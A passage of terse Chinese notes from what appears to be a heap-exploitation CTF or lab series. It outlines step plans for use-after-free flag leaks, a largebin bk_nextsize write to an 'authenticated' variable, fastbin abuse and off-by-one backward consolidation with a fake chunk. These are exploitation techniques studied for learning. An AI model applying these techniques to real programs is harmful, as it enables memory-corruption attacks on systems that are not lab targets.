2.read_flag发起0x52A字节的分配请求,合并fastbins堆块到topchunk,并拿到flag_chunk

3.直接从小堆块上UAF,puts即可泄露flag

level2

攻击假设:

0.有malloc也有calloc, malloc最大0x420, calloc无限制

1.free不清空指针,UAF

level4.0

最小3000字节的堆块

只能考虑largebins和unsortedbin的利用方法

目标是将authenticated @ 0x4041C0写上任意值

步骤:

大于3000字节的largebin,比如0xbc0-0xbf0

可以申请0xbd0,0xbe0

1.A = malloc(0xbe0)

barrier

2.B = malloc(0xbe0)

barrier

3.C = malloc(0xbd0)

barrier

3.free(A),free(B)进入largebin,UAF泄露bin地址和堆块地址

4.malloc(0xbe0)拿一个出来,剩下一个

5.UAF将authenticated挂到bk_nextsize上

6.free(C)

level5.0

有越界写

1.UAF泄露堆块基地址

2.根据相对偏移量计算得到flag_chunk的地址

如何将alloc_struct放到堆块里?

level6.0

level7.0

禁用tcache

泄露flag地址

fastbin利用,有UAF,

level8.0

最大申请0x1000

堆风水:

----------------
A
----------------
flag
----------------
B
----------------
C
----------------

1.通过B构造C->prev_size并通过off-by-one将C->prev_in_use 归0

2.在A中构造假的堆块头,这需要设置fd和bk指针

3.free C,向前合并到A